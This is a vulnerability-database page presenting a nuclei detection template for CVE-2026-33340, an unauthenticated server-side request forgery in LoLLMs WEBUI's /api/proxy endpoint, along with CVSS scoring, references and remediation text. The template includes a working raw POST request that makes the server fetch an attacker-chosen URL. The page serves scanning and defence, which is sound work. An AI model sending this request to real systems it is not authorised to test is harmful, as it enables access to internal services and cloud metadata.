Lucene search
K

LoLLMs WEBUI - Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

LoLLMs WEBUI SSRF via unauthenticated /api/proxy endpoint allows arbitrary GET requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-33340
24 Mar 202615:58
attackerkb
Circl
CVE-2026-33340
29 Mar 202617:02
circl
CNNVD
LoLLMs WEBUI 安全漏洞
24 Mar 202600:00
cnnvd
CVE
CVE-2026-33340
24 Mar 202615:58
cve
Cvelist
CVE-2026-33340 LoLLMs WEBUI has unauthenticated Server-Side Request Forgery (SSRF) in /api/proxy endpoint
24 Mar 202615:58
cvelist
EUVD
EUVD-2026-14928
24 Mar 202615:58
euvd
NVD
CVE-2026-33340
24 Mar 202617:16
nvd
Packet Storm
📄 lollms-webui Server-Side Request Forgery
31 Mar 202600:00
packetstorm
Packet Storm
📄 lollms-webui Server-Side Request Forgery
24 Apr 202600:00
packetstorm
Positive Technologies
PT-2026-27456
24 Mar 202600:00
ptsecurity
Rows per page
id: CVE-2026-33340

info:
  name: LoLLMs WEBUI - Server-Side Request Forgery
  author: theamanrawat
  severity: critical
  description: |
    LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.
  impact: |
    Attackers can access internal services, scan local networks, or exfiltrate sensitive cloud metadata, potentially leading to data exposure and further compromise.
  remediation: |
    Update to a patched version once available or apply mitigations to restrict server-side requests.
  reference:
    - https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33340
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-33340
    epss-score: 0.21629
    epss-percentile: 0.97326
    cwe-id: CWE-306
  metadata:
    max-requests: 1
    verified: true
  tags: cve,cve2026,lollms,ssrf

http:
  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url": "http://{{interactsh-url}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains(interactsh_protocol, "http")'
          - 'contains(body, "{\"content\":\"")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220544e7d067f8d9fb32335872ea8e3733389166ac3317b6584a5737cb9019b96b3022067938b6f4c014aca20e4b6cc2c5ee3075a5e0f550d9e27dfe1e1eac85cf4dfa8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Apr 2026 12:26Current
6Medium risk
Vulners AI Score6
CVSS 3.19.1
EPSS0.21629
SSVC
14